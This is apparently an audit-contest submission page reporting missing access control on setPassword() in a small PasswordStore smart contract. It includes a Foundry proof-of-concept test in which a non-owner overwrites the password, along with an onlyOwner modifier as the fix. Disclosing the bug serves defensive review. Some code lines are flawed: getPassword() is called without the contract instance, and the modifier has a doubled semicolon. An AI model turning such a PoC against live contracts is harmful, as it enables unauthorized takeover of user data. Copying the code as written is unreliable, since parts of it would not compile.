Submission Details
Severity:
Lack of access control on setPassword() allows anyone to change user's password
Summary
Missing modifier on setPassword() allows anyone to call the function and change owner's s_password. This breaks the core invariant of the contract.
Vulnerability Details
Coded POC:
// SPDX-License-Identifier: MIT
import {Test, console} from "forge-std/Test.sol";
import {PasswordStore} from "../src/PasswordStore.sol";
contract ChangePassword is Test {
// Contract instance
PasswordStore ps;
// Sample address
address alice = makeAddr("alice");
function setUp() public {
ps = new PasswordStore(); // Creates new instance of PasswordStore contract and sets this contract to it's owner
}
function testChangeOwnerPassword() public {
vm.prank(alice);
ps.setPassword("hehe get rekt");
assertEq(getPassword(), "hehe get rekt");
}
}
Impact
Anyone can set a user's password to any other string value.
Tools Used
Manual Review
Recommendations
Add a modifier to setPassword() function to only allow the s_owner to call it.
modifier onlyOwner() {
if (msg.sender != s_owner) revert PasswordStore__NotOwner();;
_;
}
Updates
Lead Judging Commences
inallhonesty
about 2 years ago
inallhonesty about 2 years ago
Submission Judgement Published Assigned finding tags:
finding-lacking-access-control
Anyone can call `setPassword` and set a new password contrary to the intended purpose.
Rewards breakdown
nSLOC
20This contest has a flat reward structure with the following payouts:
100 EXP
20 EXP
2 EXP
Live
The contest is live. Earn rewards by submitting a finding.
Appeals
This is your time to appeal against judgements on your submissions.
Appeals Review
Appeals are being carefully reviewed by our judges.